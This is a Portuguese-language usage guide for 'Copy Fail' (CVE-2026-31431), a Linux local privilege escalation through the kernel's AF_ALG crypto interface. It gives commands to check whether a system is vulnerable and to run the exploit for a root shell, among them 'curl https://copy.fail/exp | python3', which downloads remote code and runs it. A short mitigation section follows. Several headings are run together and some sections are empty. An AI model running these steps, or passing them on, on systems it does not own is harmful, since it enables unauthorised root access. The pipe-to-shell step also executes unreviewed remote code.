
A maioria dos LPEs Linux precisa de uma janela de corrida ou de um offset específico do kernel. Copy Fail é uma falha lógica de linha reta, não precisa de nenhum dos dois. O mesmo script Python de 732 bytes (ou .c elf) dá root em todas as distribuições Linux lançadas desde 2017.
Este conteúdo é apenas para fins educacionais e de testes de segurança autorizados. NÃO execute isso em sistemas sem permissão explícita.
Copy Fail (CVE-2026-31431) é uma vulnerabilidade de Escalação Local de Privilégios (LPE) no Linux que afeta a API de criptografia do kernel via AF_ALG.
Ela permite que um usuário sem privilégios sobrescreva dados do cache de páginas de um binário SUID (ex.: /usr/bin/su) e obtenha acesso root.
AF_ALG habilitadoalgif_aead carregadoos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Indicadores esperados:
authencesn(hmac(sha256),cbc(aes))algif_aead carregadopython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Resultado esperado:
uid=0(root)
os.splice not foundCausa:
Solução:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Possíveis causas:
Instale as ferramentas necessárias:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Atualize seu sistema:
apt update && apt upgrade
Se o exploit falhar, considere:
Use este exploit com responsabilidade apenas em laboratórios, CTFs e testes de penetração autorizados.